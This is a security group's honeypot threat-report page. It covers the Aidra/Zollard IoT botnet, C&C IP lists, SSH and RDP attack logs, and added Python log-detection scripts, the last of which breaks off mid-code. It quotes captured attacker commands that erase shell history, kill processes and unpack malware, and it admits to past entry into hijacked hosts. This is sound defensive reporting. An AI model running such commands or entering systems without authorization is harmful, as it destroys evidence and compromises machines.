ATMA - darknet - securite internet - deepweb - darkweb
We identify and fight:
- Attackers who try to spy on or remotely control other people's computers by means such as Microsoft Remote Desktop, SSH, Telnet or shared desktops.
- Threats to email servers or users: spiders/bots, account hijacking, etc.
- Sites spreading viruses, trojans, spyware, etc., or merely used by malware as a beacon to let its authors know that a new computer has been infected.
- Threats to servers: exploits, forged identities/user agents, DDoS attackers, etc.
- Port scans, which are the first step towards more dangerous actions.
- Malicious P2P sharers or bad peers who spread malware, inject bad traffic or share fake archives.
Are we hackers?
No, we are not: we only report threats, exchange information with other researchers and warn owners, authorities and providers. Nevertheless, in the past we did get into a few hijacked hosts, for a number of reasons:
- They were among the most aggressive and resilient ones at that moment.
- There was a risk of alerting the bad guys before the real administrator.
- There was a good chance of gathering the controllers' IPs and other data about them.
App for Android "CleanMaster"
While reviewing logs in April 2017 we found that some visits were automatically followed by others:
88.18.nnn.nnn - - [01/Apr/2017:16:35:46 +0200] "GET /FolderInMyServer/ HTTP/1.1" 200 8286
"Mozilla/5.0 (Linux; Android 5.0.2; P01Z Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
88.18.nnn.nnn - - [01/Apr/2017:16:35:58 +0200] "GET /FolderInMyServer/FileInThatFolder HTTP/1.1" 206 1
"Mozilla/5.0 (Linux; Android 5.0.2; P01Z Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
18.104.22.168 - - [01/Apr/2017:16:39:43 +0200] "GET /FolderInMyServer/ HTTP/1.1" 200 8286 "-"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; MAXTHON 2.0); Connect Us
Other IPs behaving like that were 22.214.171.124 and 126.96.36.199, all owned by Amazon EC2. The user agent was truthful: all those visitors had installed the app developed by Cheetah Mobile, a Chinese company. What's more, even when you are not browsing the web, the app connects frequently to a Chinese IP. On April 23rd we asked them by email and never got an answer, so beware: you will find nothing about this in their privacy policy, but the "CleanMaster" app literally browses the web along with you.
In January 2012 we started detecting a great number of attacks, mainly over Telnet, coming from all sorts of devices (home routers, IPTV/set-top boxes, DVRs, VoIP devices, IP cameras and media centres) that had been hijacked by a new malware, named by its primary author "The Aidra bot-net".
Chances are that your desktop antivirus, firewall, etc. will neither detect nor stop it. Keep your network devices switched off when you don't need them, avoid, more than ever, default, empty or trivial passwords, and close every port you don't really need.
Update January 2014: the latest Aidra-like malware targets all sorts of embedded devices and overloads them with Bitcoin-mining tools. See how this device will soon get fried (never mind the electricity bill...):
The example above is an IP camera by esslsecurity.com built on an ARM Hi3515 board, but any "Internet of Things" device might get infected: SOHO routers, smart TVs, set-top boxes... or a fridge :) Below, the login page of a cheap Hikvision CCTV system, with a brilliant default root password: 12345.
Should you want to know more about this Aidra-like malware, known as Zollard, see spamversand.de or deependresearch.org. For the list of IPs/hosts, see below.
We want everyone out there to know that we have been warning several hosting providers since 2012 about hosts of theirs acting as Aidra C&Cs. Some of them, like OVH, Linode, Beirtelecom and Corexchange, did nothing. Be warned: hosting your site on any of those providers means you are likely to end up blacklisted by most anti-malware tools. On the other hand, we congratulate a few responsible services and companies: Edis.at, VPS.net, Qc.to/Afraid.org and LusoVPS.com.
We want to thank especially those few individuals who answered our first call for help by reporting logs, sharing information, etc. Thank you Claus Marxmeier, "Internick.internick" and Robert Sauber.
Q: How can I disinfect my device?
A: Quite often just rebooting it will work, since the bot usually does not survive a reboot. However, try to access it using Telnet: if you can't, either it has been persistently hijacked or, more probably, your device is bricked. Some Aidra builders were so clumsy that not only did they fail, but they may have left your device impaired. In that case contact us, since there is a fair chance it can be recovered with a little help.
Q: How can I protect my devices?
A: If you really need Telnet, set a non-trivial password; better still, disable Telnet, use SSH with a strong password or keys, and never expose the management interface to the Internet. Desktop tools such as antivirus, firewall, etc. will not help: they protect the machine they run on, not your router, IP camera, NAS, TiVo...
Q: How many devices are infected worldwide?
A: It has been said that about 11,000, but that figure is very uncertain: it was an estimate somebody made from a screenshot of a command panel. There are several Aidra botnets and variants, so you would need to count the devices infected by all of them. On top of that, a rebooted device very often stays clean until it is reinfected, so the total can vary greatly in a matter of hours. That said, in June 2012 the number of infections began to decrease. Sadly, in August there were botnets with about 18,000 zombies.
Q: Is my smartphone or tablet at risk?
A: At the moment, not especially. Somebody misunderstood our report. We only said that, in theory, Aidra could infect some smartphones, since it is built for all sorts of CPUs, but we have never detected a single one. In practice Aidra would need to be adapted to a particular file system, hardware, etc., and to use something other than Telnet to get in. That is why Aidra seldom infects those devices: the first time we saw an infected Android device was in August 2012. That said, your smartphone can be infected by many other kinds of malware. On a side note: Android is built on the Linux kernel, whereas iOS is not (it runs on Apple's Darwin/XNU kernel), and in both cases the internals are quite particular.
Q: What about my desktop computer or laptop?
A: Currently there is not much reason to worry about Aidra: it spreads over Telnet to embedded Linux devices with weak passwords, something desktops and laptops rarely expose.
Q: Will Linux be unsafe from now on?
A: Not at all. Aidra takes advantage of careless or lazy users/admins who don't care about passwords. You can buy the best safe in the world, but if you leave it open...
Q: Is Aidra such a great threat?
A: For individuals it depends on a number of things. If Aidra took over your set-top box, for example, chances are you would just find the Internet slower than usual. But, if I were you, I wouldn't want any kind of malware inside my home router, because all your traffic could then be trivially intercepted. Moreover, since September 2012 an Italian botmaster has been trying hard to make money from Aidra, which he has used for his Bitcoin affairs; he is also interested in smart cards, which would be much more worrying. Apart from that, we bet that, given the careless attitude of governments and companies, sooner or later malware of this kind will be improved enough to scare the entire world.
Q: Which countries are more affected?
A: As said, it is hard to say even how many infected devices there are. In Europe most nets have been commanded from Italy (though using servers in other countries), while most infected devices used to be in Sweden, Switzerland, the Netherlands and Poland; many also in India and China, and not as many as expected in the USA and Japan. As of June 2012 Aidra had nearly vanished, but two very active botnet sets were still left. We sent evidence about the first one to the Carabinieri and got (not surprisingly) no answer. The other Aidra botnet set was alive and kicking, though quite silent since August; strangely, it was targeting IPs mostly in the US. Finally, although it was not its primary purpose, Aidra has been fought quite successfully for more than a year by the author of Carna (whose identity shall remain unrevealed).
Q: I would like to know in detail about Aidra, or get samples, source code...
A: Contact us and tell us about you or your organization (whichever applies) and what you want that material for.
Aidra hosts as of 17 Sept. 2012 (for later ones, read below):
(*) Very active.
(**) Not a true Aidra but a "DDoS-only" version (Kaiten).
(***) Redirector disabled
(****) Attacking Monsanto websites
On Sept. 18th we were receiving so many malware samples (and not only "fresh Aidra builds") that we thought it worthwhile to start the historical track below. Please note that, conversely, some Aidra builds that have been active for a long time are listed above.
Sept. 23rd, attacking:
(both IPs, in turn, used by hackers)
120917A (2 malware samples in this record)
188.8.131.52:6667 ircnet.irkki.fi irc.atw-inter.net irc.stealth.net open.ircnet.net uk.ircnet.org
184.108.40.206:8620 sm4sh.mashing.it OVH Italia
(We had a hiatus from December to February)
220.127.116.11:6667 (Pusat Media)
18.104.22.168:6667 (Uber Global)
22.214.171.124 126.96.36.199.vps.nixhosting.org myLoc
188.8.131.52 184.108.40.206.vps.nixhosting.org myLoc
220.127.116.11 WEDOS (Cz)
18.104.22.168 Dacentec (US)
22.214.171.124 ks26330.kimsufi.com (OVH) or:
(most also resolve to 126.96.36.199)
188.8.131.52 li433-213.members.linode.com www.pucssa.org
184.108.40.206 VPS NET
220.127.116.11 aku.eten-keren-a.biz (Linode)
18.104.22.168 rapidshare-search-center.com (OC3, USA)
22.214.171.124 irc.coplax.us.to (Sharktech)
126.96.36.199 Wedos (Cz)
188.8.131.52 Tilaa (NL) (already dead)
184.108.40.206 atlantic532.eu.unmetered.com (Germany)
220.127.116.11 ks39329.kimsufi.com (OVH)
Versions like this one are compiled with messages in perfect Italian:
"Alla prossima BoSS... baciamo le mani!" (Until next time, boss... we kiss your hands!)
"Hai sbagliato Frocio di Merda!" (You got it wrong, -insult-!)
18.104.22.168 (USA, VPS Cheap)
Aidra had slowed down its new releases,
so a handful of versions went unpublished during these months.
Starting with this one, nearly all new versions are "Zollard" malware.
22.214.171.124 155.ip-46-105-17.eu OVH
126.96.36.199 OVH Systems socialmediaexpert.info
188.8.131.52 FranTech Solutions buyvm.net; april: calpolyfast·org
184.108.40.206 mining.usa.dallas.hypernova.pw (OVH)
220.127.116.11 ds.protected.javapipe.com > 18.104.22.168.reserved.voxility.com (Romania)
22.214.171.124 ltc-eu.give-me-coins.com (Secured Servers LLC)
126.96.36.199 hosted-by.securefastserver.com (qhoster.net)
188.8.131.52 184.108.40.206.in-addr.arpa.static.cnservers.com (US)
220.127.116.11 OVH, FR
18.104.22.168 Fastreturn, US
22.214.171.124 vypor.is.awesome.net Quadranet. US
126.96.36.199 Ecatel, NL
188.8.131.52 Serverius Holding (NL)
Same as 140209, also using:
184.108.40.206:3339 Serverius hosting (NL)
220.127.116.11:164 mcflix.com and ww20.netkl.org Dacentec, Inc. (US)
"Reloaded" 140209 miner version
18.104.22.168 unassigned.quadranet.com OC3 Networks & Web Solutions (US)
"Reloaded" 140210 miner version
22.214.171.124 Ecatel Network, Netherlands
Surely a new 140202 version, with quite a complete set of "features":
trying to permanently infect devices, ad fraud
and stealing set-top box credentials.
126.96.36.199 resolving as '.' :) FranTech Solutions (US)
188.8.131.52 FranTech Solutions (US)
184.108.40.206 Eonix Corporation (US)
220.127.116.11 li352-247.members.linode.com (UK)
We are glad "Vypor" has been visiting us in April from 18.104.22.168.
Again, a new 140202 version
22.214.171.124 WholeSale - MJS Marketing, US. financecox.com, gamersnoo.com and a few more
126.96.36.199 Snel Internet Services, Netherlands smartmoneymakers2.com
188.8.131.52 connect.bigddos.net irc.bigddos.net Pallada Web Service / PWS-Network Russia
"Reloaded" 140210 miner version
184.108.40.206 Ecatel Network,NL
220.127.116.11 212-129-3-25.rev.poneytelecom.eu ONLINE S.A.S France
"Reloaded" 140210 miner version
18.104.22.168 Snel, Netherlands
22.214.171.124 Ecatel Network,NL, now in TCP 3342
126.96.36.199 DataWagon LLC US
188.8.131.52 205.ip-92-222-162.eu AS16276 OVH
184.108.40.206 AS16276 OVH Hosting Canada
New 140209 version
220.127.116.11 in TCP 9003, Fastreturn, US
18.104.22.168 former vypor.is.awesome.net, now 22.214.171.124.static.quadranet.com
126.96.36.199 crypto-pump.com WholeSale - MJS Marketing
Just another "Vypor" clone
188.8.131.52 TCP 8005 nlnd02.xsltel.com Ecatel NL
184.108.40.206 h-176-10-250-37.na.cust.bahnhof.se Bahnhof Internet, Sweden
Rebuilt 140815 version
220.127.116.11 in TCP 65533 and 65534 nlnd02.xsltel.com Ecatel NL
18.104.22.168 AS46816 Directspace houlai.org, nvshizhu.com
22.214.171.124 AS8473 Bahnhof Internet, Sweden
126.96.36.199 AS9009 M247 Open Hosting, UK
188.8.131.52 AS32097 WholeSale MJS Marketing
Rebuilt 140815 version, same IPs
About our Twitter account
All tweets are randomly delayed: it may take hours or days after the actual detection. Besides, due to Twitter limits, we tweet only a fraction of all detections (we usually skip already well-known bad IPs, such as those famous Chinese SSH attackers).
For those who send traffic claiming to be "good", for academic purposes or for the sake of our own safety, please note that our policy is simple: a single unexpected SYN packet may be enough to be reported. If your intentions are not hostile, surely the world already knows about them and our reports don't mean a thing.
If you are a hosting company, ISP or the like, don't ask us for detailed logs, evidence, etc. unless they are really needed. Firstly, if you really want to know about them, in most cases it is as easy as monitoring the outbound traffic related to the reported attacks. Secondly, we cannot provide dozens of such reports for free every single day. Keeping an eye on your customers' behaviour is your job, not ours. Besides, we will never answer dumb Twitter bots spitting "Please report that issue to blah blah" tweets, only to enter a "customer ticket hell" and get a final response such as "Sorry, you are not a customer of ours, please email to...".
Currently, our tweets fall into one of these categories:
"ssh": SSH daemon/server, usually port TCP 22, although we watch alternative ports for most services.
"telnet": Telnet daemon/server, usually TCP 23.
"mailer": Email daemon/server, several ports.
"rdp": Windows terminal server (Remote Desktop), usually TCP 3389.
"vnc": VNC remote desktop servers, usually TCP 5900.
"ftp": File Transfer Protocol, usually TCP 21.
"spam": Email/forum/referral/you-name-it spammers, close affiliates or just those who pay for it.
"malware": Plain hosting, command & control servers, etc.
"http": Threats, scans, bad crawlers, etc. targeting web servers and related technologies such as HTTPS, proxies, PHP, *SQL...
"ntp": Network Time Protocol, commonly abused for DDoS amplification attacks.
"dns": Domain Name System, commonly abused for DDoS amplification attacks.
"smb": Windows shares (NetBIOS, SMB, CIFS).
"unspecified": such as those targeting port 19 (CharGen), port scans, ping floods, etc.
Yet one more backdoor in an embedded device?
After taking a look at the file system of a used Zyxel P-2612HNU that we recently got, we found a weird thing apart from the already known vulnerabilities such as the "NsaRescueAngel" issue. If you type gzip -d /mnt/NAND/etc/rc.conf.gz -c in a Telnet session, you'll get:
184.108.40.206 belongs to CSC (Computer Sciences Corporation, Virginia, US) and there are/were four domains pointing to that IP: bhsywg.com (protected whois), gporodiedan.com (Mexican company), advocaciatorresrn.com (Brazilian company) and kedvezo-hitelek.com (protected whois). Could someone skilled in TR-069 tell us whether this could be a backdoor, and who might have put it there, or whether, on the contrary, it is just debugging data left behind?
Since June 21st the website escolademusica.molinsderei.org had been attacking servers in Spain. First we warned the ISP, the webmaster and the town council's authorities (none was kind enough to reply with even a mere "thanks") and afterwards we investigated who the actual attackers might be. Let's assume that in Molins de Rei there are no fanatics related to that website, so they were using hijacked servers, plus some proxies and a lot of IPs from Islamic countries. After some searching in Google, Whois, geolocation, etc., we found that the culprits are an Islamic gang of script kiddies who compete mostly for defacements while sharing pro-Islamic interests.
The good news is that they are clumsy and not very skilled: most just look for misconfigured servers with HTTP PUT enabled; they simply try to upload a file and then download it, which proves that PUT is working. So we got one of those files, a GIF image whose author uses it as a "signature" (filename in Russian, clever as can be), and we waited...
Within a few hours we saw the first "PUT /nyet.gif" + "GET /nyet.gif" attempt. Believing he had succeeded, he hurried to report his "achievement" to his mates :) on the infamous www.zone-h.org and, in no time, we began receiving more attacks of the kind, as well as some XSS attempts. Some days later they gave up, but meanwhile we collected all their IPs (please note: we are not listing proxies or hijacked servers, which, by the way, are mostly a Kosovar speciality):
IP address Other information
AS36947 Algerie Telecom
AS36947 Algerie Telecom
AS197328 31-210-117-181.turkrdns.com, Turkey
AS29256 Syrian Telecommunications
AS35819 Etihad Etisalat Company, Saudi Arabia
AS36947 Annaba Telecom, Algeria
AS51407 Mada ALArab LTD Segment, Palestine
AS37492 Orange - Agence Tunisienne Internet
AS36947 Region Chlef, Algeria
AS6713 ADSL_Maroc_telecom, Rabat, Morocco
AS29256 Tarassul ISP, Syrian Telecommunications
AS12975 Palestine Telecom
AS35819 Saudi Arabia
AS9121 TTNET Turk Telekomunikasyon
AS37492 ORANGE-TN Tunisia
AS6713 IAM-AS,MA Morocco Tangier Maroc Telecom
AS8452 TE Data, Egypt
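As an added example (not the page's own code), here is a small Python script that runs over combined-format access log lines and flags the two behaviours described on this page: the PUT-then-GET probe for writable web roots used by the defacers above, and the "follow-on" visit pattern from the CleanMaster section, where a path fetched from a phone is re-fetched minutes later by an unrelated IP with a different user agent. The log lines, IPs, paths and user agents in the sample are constructed for this example.

```python
"""Two access-log checks described on this page, written as an added example.
1. find_upload_probes: a PUT on a path followed by a GET of the same path from the
   same client, i.e. someone testing whether the web root is writable.
2. find_follow_on_visits: a path fetched by one client and re-fetched shortly after
   by a different IP with a different User-Agent (the CleanMaster pattern).
The sample log (IPs, paths, user agents) is constructed for this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx "combined" format: ip ident user [ts] "req" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample: a phone visit echoed by a crawler 4 minutes later, a PUT that the
# server rejected (405) but whose GET hit our decoy file, and a PUT that really succeeded.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Apr/2017:16:35:46 +0200] "GET /FolderInMyServer/ HTTP/1.1" 200 8286 "-" "Mozilla/5.0 (Linux; Android 5.0.2) Chrome/56.0.2924.87"
192.0.2.10 - - [01/Apr/2017:16:39:43 +0200] "GET /FolderInMyServer/ HTTP/1.1" 200 8286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MAXTHON 2.0)"
198.51.100.7 - - [01/Apr/2017:17:02:01 +0200] "PUT /nyet.gif HTTP/1.1" 405 312 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Apr/2017:17:02:02 +0200] "GET /nyet.gif HTTP/1.1" 200 4012 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Apr/2017:17:10:00 +0200] "PUT /x.txt HTTP/1.1" 201 0 "-" "curl/7.52.1"
198.51.100.9 - - [01/Apr/2017:17:10:01 +0200] "GET /x.txt HTTP/1.1" 200 12 "-" "curl/7.52.1"
"""


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def parse_log(text):
    return [r for r in (parse_line(l) for l in text.splitlines()) if r]


def find_upload_probes(records, window=timedelta(minutes=10)):
    """PUT then GET of the same path from the same IP within `window`.
    `accepted` is True only when the PUT itself got a 2xx: a 200 on the GET alone
    proves nothing, because the server (or a honeypot) may serve a decoy."""
    puts = defaultdict(list)
    hits = []
    for r in records:
        key = (r["ip"], r["path"])
        if r["method"] == "PUT":
            puts[key].append(r)
        elif r["method"] == "GET":
            for p in puts[key]:
                if timedelta(0) <= r["ts"] - p["ts"] <= window:
                    hits.append({"ip": r["ip"], "path": r["path"],
                                 "put_status": p["status"], "get_status": r["status"],
                                 "accepted": 200 <= p["status"] < 300})
                    break
    return hits


def find_follow_on_visits(records, window=timedelta(minutes=15)):
    """A path first fetched by client A, then fetched within `window` by a different
    IP with a different User-Agent: the signature of an app or proxy re-crawling
    whatever its users browse."""
    first_seen = {}
    hits = []
    for r in records:
        if r["method"] != "GET":
            continue
        prev = first_seen.get(r["path"])
        if prev is None:
            first_seen[r["path"]] = r
            continue
        if r["ip"] != prev["ip"] and r["ua"] != prev["ua"] and r["ts"] - prev["ts"] <= window:
            hits.append({"path": r["path"], "first_ip": prev["ip"], "follower_ip": r["ip"],
                         "follower_ua": r["ua"],
                         "delay_s": int((r["ts"] - prev["ts"]).total_seconds())})
    return hits


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for h in find_upload_probes(recs):
        print("upload probe:", h)
    for h in find_follow_on_visits(recs):
        print("follow-on visit:", h)
```

The upload check deliberately keys on the PUT's own status rather than on the GET, which is exactly the trick played on the defacer above: a decoy file makes the GET succeed while the PUT never did. To turn the follow-on check into an alert in production, whitelist the crawlers you expect (search engines, your own monitoring) by IP range before counting a hit.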
Beware fake Microsoft assistance scam
In May-June 2014 several people in Spain were phoned by a fake Microsoft customer service. So far these are the numbers we know of: 16077670057 and 15124511556. Beware also of 4935120443, 442033100000 and 18176499077.
Atma.es under attack
No wonder, just another one, but this time it was more intense than usual, though not sophisticated at all: they simply tried to overload this server by downloading some files over and over. By using our own deny list (exceptionally and urgently updated during those days) we got rid of most malicious visitors (nearly all of them proxies on infected boxes or Tor exit nodes). Happily, some of them soon went offline because they could not cope with some traffic bounced back at them :) Please, dear attacker (as long as you can't find a better way), keep on trying, we miss your huge amount of requests!!!
Yet another University scanning the entire world!
On this website we have already talked about Columbia University peeking inside each and every IP in the world for years. Well, it seems to be the fashion these days in the USA, since in 2013 the University of Michigan began similar "research". If you want to get rid of those visits, block all IPs from 220.127.116.11 to 18.104.22.168.
WTF is going on with some of Microsoft's IPs?
8075 | MICROSOFT-CORP---MSN-AS-BLOCK | 22.214.171.124 | 2012-11-03 17:15:18 | vncprobe
8075 | MICROSOFT-CORP---MSN-AS-BLOCK | 126.96.36.199 | 2012-11-08 06:53:08 | vncprobe
8075 | MICROSOFT-CORP---MSN-AS-BLOCK | 188.8.131.52 | 2012-11-08 06:30:55 | vncprobe
8075 | MICROSOFT-CORP---MSN-AS-BLOCK | 184.108.40.206 | 2012-11-08 05:49:12 | vncprobe
One incident in detail:
08/11/2012 04:13:32 Got connection from client 220.127.116.11
08/11/2012 04:13:32 authProcessClientMessage: authentication failed from 18.104.22.168
08/11/2012 04:13:32 rfbAuthProcessClientMessage: password check failed
08/11/2012 04:13:32 Client 22.214.171.124 gone
08/11/2012 04:13:32 Statistics events Transmit/ RawEquiv ( saved)
08/11/2012 04:13:32 TOTALS : 0 | 0/ 0 ( 0.0%)
08/11/2012 04:13:32 Statistics events Received/ RawEquiv ( saved)
08/11/2012 04:13:32 TOTALS : 0 | 0/ 0 ( 0.0%)
08/11/2012 04:13:33 Got connection from client 126.96.36.199
July 2013, some more detected from MSN-AS-BLOCK:
188.8.131.52 184.108.40.206 220.127.116.11
18.104.22.168 22.214.171.124 126.96.36.199
(Yet another) Remote desktop attack
We receive attacks on port 3389 daily, but lately they have increased hugely. This is what we got yesterday (Sept. 22nd) from one IP alone:
Universities and hacking
The fact that important and prestigious institutions have infected computers is worrying; even more so when we are talking about departments that teach computing. In the past we warned some of them in Germany, the USA and the UK, and all of them sorted the issue out promptly. On the contrary, others, like the Spanish UNED, neither answered nor fixed them. This September it happened again: this time we warned the "Dipartimento di Informatica" of the University of Milan about 188.8.131.52 (kermit.crema.unimi.it), which was attacking other people's port 3389. More than a month ago we wrote to nine email addresses (professors, researchers and administrative staff) and none of them was kind enough to write back a single line. So we still don't know whether it was an infected box or they were the real attackers but, at least, we have detected no more attacks since then.
Why does Nokia want to know my email password?
Did you know that when you use Nokia's email app you are handing them your address and password, as seen in this blog? In Nov. 2011 we checked it ourselves using a Nokia X3-02 and a Gmail account:
Chinese and russian scanners
In Oct. 2011 a number of IPs came to our attention. Mostly located in China, those people have been scanning the rest of the world for years.
Clearly linked to "Proxyfire":
Other scanners:
Note that it is useless to complain or warn anyone, since they are not hijacked devices. Whatever their other intentions, as a result of their actions many others waste time and resources, and that's why we wrote at the time that we would do our best to disturb them a little from March on; we are glad to see that Proxyfire faced some trouble during April:
The other scanners needed to set up at least five new (until then spare) sites after April 2012:
184.108.40.206 proxyproxys·com piggmail·com verysurf·com nsegame·com
A boo for a couple image-hosting places
In Sept. 2011 our site suffered a persistent attack from 220.127.116.11, a (by then) hijacked server in Poland. We contacted the owners and studied the malware. As a result, we learned that those Indonesians were using a few image-sharing sites to host their "soft", so we contacted iconspedia.com and tinypic.com asking for their help (a third site was clearly involved too). No answer at all.
Where on earth are the Honeypots?
After reading the FBI's "Cyber Crime Alert" report (spring 2011) it seems that the bad guys think that here in Spain we run an incredible 69 per cent of the world's honeypots and, besides, they share the IPs where honeypots are supposed to be. Well, as far as our own IPs are concerned, whether they are right or not must remain unrevealed, but the given percentage is utterly wrong. In fact, we don't know of any other honeypot here apart from ours.
Weird ways of fighting cybercrime:
Visit from www.delitosinformaticos.gov.co (Colombian gov. agency "Grupo Investigativo Delitos Informáticos") :
18.104.22.168 - - [17/Feb/2010:13:57:49 +0200] "GET pollbooth.php?include_path HTTP/1.1" 404 613 www.atma.es "-" "Mozilla/5.0" "-"
No comment :D
September 2009: attackers tried to log in under 10,374 different user names.
The most attacked were:
Advice: choosing user names in a language other than English is safer. Spanish speakers should avoid "David", "Amanda" and "Martin" (common names in both languages).
Bad boys never sleep:
2009, the night of December 24th. While many countries were celebrating Christmas Eve, attackers were taking advantage of it. The most striking one we detected during those hours was an SSH dictionary attack from 22.214.171.124: it lasted 8 hours and tried 20,859 username + password combinations.
2010, July 7th. While millions were enjoying the Germany vs Spain FIFA World Cup 2010 semi-final, a host in Spain reported a (not actually) successful SSH dictionary attack:
Jul 7 19:27:42 (void) sshd: Accepted password for (not shown) from 126.96.36.199 port 47065 ssh2
Jul 7 20:25:37 (void) sshd: Accepted password for (not shown) from 188.8.131.52 port 46649 ssh2
Jul 7 21:17:08 (void) sshd: Accepted password for (not shown) from 184.108.40.206 port 1266 ssh2
Jul 7 23:45:48 (void) sshd: Accepted password for (not shown) from 220.127.116.11 port 33195 ssh2
Jul 7 23:47:14 (void) sshd: Accepted password for (not shown) from 18.104.22.168 port 51866 ssh2
Jul 7 23:53:28 (void) sshd: Accepted password for (not shown) from 22.214.171.124 port 30856 ssh2
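As an added example (not the page's own code), a Python script that parses sshd log lines in the format shown above, finds dictionary attacks (many failed passwords from one source), flags an "Accepted" login that follows a burst of failures from the same IP (what the honeypot above recorded as a "not actually" successful login) and lists the most attacked user names. The syslog lines are constructed for the example; the hostname, IPs, users and year are assumptions.

```python
"""sshd log triage, written as an added example: dictionary attacks, suspicious
accepted logins after a burst of failures, and the most attacked user names.
The syslog lines below are constructed for this example (host, IPs, users assumed).
"""
import re
from collections import Counter, defaultdict
from datetime import datetime

# "Mon DD HH:MM:SS host sshd[pid]: (Accepted|Failed) password for [invalid user] USER from IP port PORT ssh2"
# The user field is non-greedy so placeholders with spaces such as "(not shown)" still parse.
SSHD_RE = re.compile(
    r'^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd(?:\[\d+\])?: '
    r'(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>.+?) '
    r'from (?P<ip>\S+) port (?P<port>\d+)'
)

# Constructed burst of 12 failures from one source, followed by an accepted login
# from the same source, plus an isolated failure and a clean login from elsewhere.
BURST_USERS = ["root", "admin", "david", "amanda", "martin", "test",
               "oracle", "root", "admin", "david", "guest", "david"]
SAMPLE_LOG = "\n".join(
    [f"Dec 24 22:{i:02d}:05 honeypot sshd[4521]: Failed password for "
     f"{'' if u == 'root' else 'invalid user '}{u} from 203.0.113.8 port {40000 + i} ssh2"
     for i, u in enumerate(BURST_USERS)]
    + ["Dec 24 22:13:00 honeypot sshd[4521]: Accepted password for david from 203.0.113.8 port 40099 ssh2",
       "Dec 24 23:10:11 honeypot sshd[4522]: Failed password for root from 198.51.100.3 port 51000 ssh2",
       "Dec 25 08:00:00 honeypot sshd[4530]: Accepted password for alice from 192.0.2.1 port 50100 ssh2"]
)


def parse_sshd(text, year):
    """Syslog timestamps carry no year, so the caller supplies it."""
    recs = []
    for line in text.splitlines():
        m = SSHD_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["ts"] = datetime.strptime(f"{year} {' '.join(d['ts'].split())}", "%Y %b %d %H:%M:%S")
        d["port"] = int(d["port"])
        recs.append(d)
    return recs


def dictionary_attacks(records, threshold=10):
    """Sources with at least `threshold` failed passwords; records are assumed in log order."""
    by_ip = defaultdict(list)
    for r in records:
        if r["result"] == "Failed":
            by_ip[r["ip"]].append(r)
    out = []
    for ip, fails in by_ip.items():
        if len(fails) < threshold:
            continue
        span = (fails[-1]["ts"] - fails[0]["ts"]).total_seconds()
        out.append({"ip": ip, "attempts": len(fails),
                    "users": sorted({f["user"] for f in fails}), "span_s": int(span)})
    return sorted(out, key=lambda x: -x["attempts"])


def suspicious_accepts(records, min_failures=5):
    """An Accepted login preceded by `min_failures` or more failures from the same IP:
    either a guessed password or a honeypot accepting everything."""
    failures = Counter()
    out = []
    for r in records:
        if r["result"] == "Failed":
            failures[r["ip"]] += 1
        elif failures[r["ip"]] >= min_failures:
            out.append({"ip": r["ip"], "user": r["user"], "ts": r["ts"],
                        "failures_before": failures[r["ip"]]})
    return out


def top_usernames(records, n=10):
    """Most tried user names among failed logins (the basis for the advice above)."""
    return Counter(r["user"] for r in records if r["result"] == "Failed").most_common(n)


if __name__ == "__main__":
    recs = parse_sshd(SAMPLE_LOG, 2009)
    print("dictionary attacks:", dictionary_attacks(recs))
    print("suspicious accepts:", suspicious_accepts(recs))
    print("top user names:", top_usernames(recs, 5))
```

On a real server the year comes from the file's mtime or from the ISO timestamps that rsyslog/journald can emit; on a honeypot that accepts any password the "suspicious accept" list is simply the list of sessions worth reading, since every one of them will be followed by the attacker's commands.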
Some flashy detections:
Telnet scans from 126.96.36.199-188.8.131.52 (Columbia University), which turned out to be a false positive. Read about their project. Nevertheless, after revisiting it in Sep. 2011, we found a number of things we dislike:
They don't say when it will end; it is always an "ongoing" project. I guess that knocking on other people's doors should last as short as possible. Since they have moved on to SSH probing, what's next?
They are making money from it: a company, several patents, sponsorship by several military offices, conferences, publications... Yet published output about the results is scarce. If nobody else is going to benefit from the research, it does not differ much from other daily scans.
Fake results on the Gnutella network from 184.108.40.206 (www.markmonitor.com) in March 2010... when looking for public-domain files!
Port scan from 220.127.116.11 (www.trustedsource.org, owned by McAfee) on December 21st, 2009.
Sharing fake files on the Gnutella network from 18.104.22.168 (Microsoft Corporation), October 21st and November 1st, 2009.
Port scan from 22.214.171.124 (Avast Antivirus) in September and October 2009.
Assorted SSH attacks
- After a previous successful login: rm -rf .bash_history
- Attempting to get rid of the honeypot: kill -9 -1 ; exit
- Sending malware to the target: tar zxvf udp.tgz
- Other deliveries came from
- Attackers don't want us to see what they do: unset HISTFILE HISTSAVE HISTLOG WATCH
- Attempting to run malware
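As an added example (not the page's own code), a Python classifier that tags commands captured by an SSH honeypot with the intent they reveal, using the commands quoted above as part of a constructed session. The rule table, the session and the download host 198.51.100.23 are assumptions for the example; a real deployment would extend the rule table from its own captures.

```python
"""Intent tagging for commands captured by an SSH honeypot, written as an added example.
The rule table and the sample session are constructed for this example; the page's own
captured commands (unset HISTFILE..., rm -rf .bash_history, kill -9 -1, tar zxvf udp.tgz)
are included in the session. The download host 198.51.100.23 is an assumption.
"""
import re
from collections import Counter

# Each rule is matched against one simple command (after splitting on ; && || |).
RULES = [
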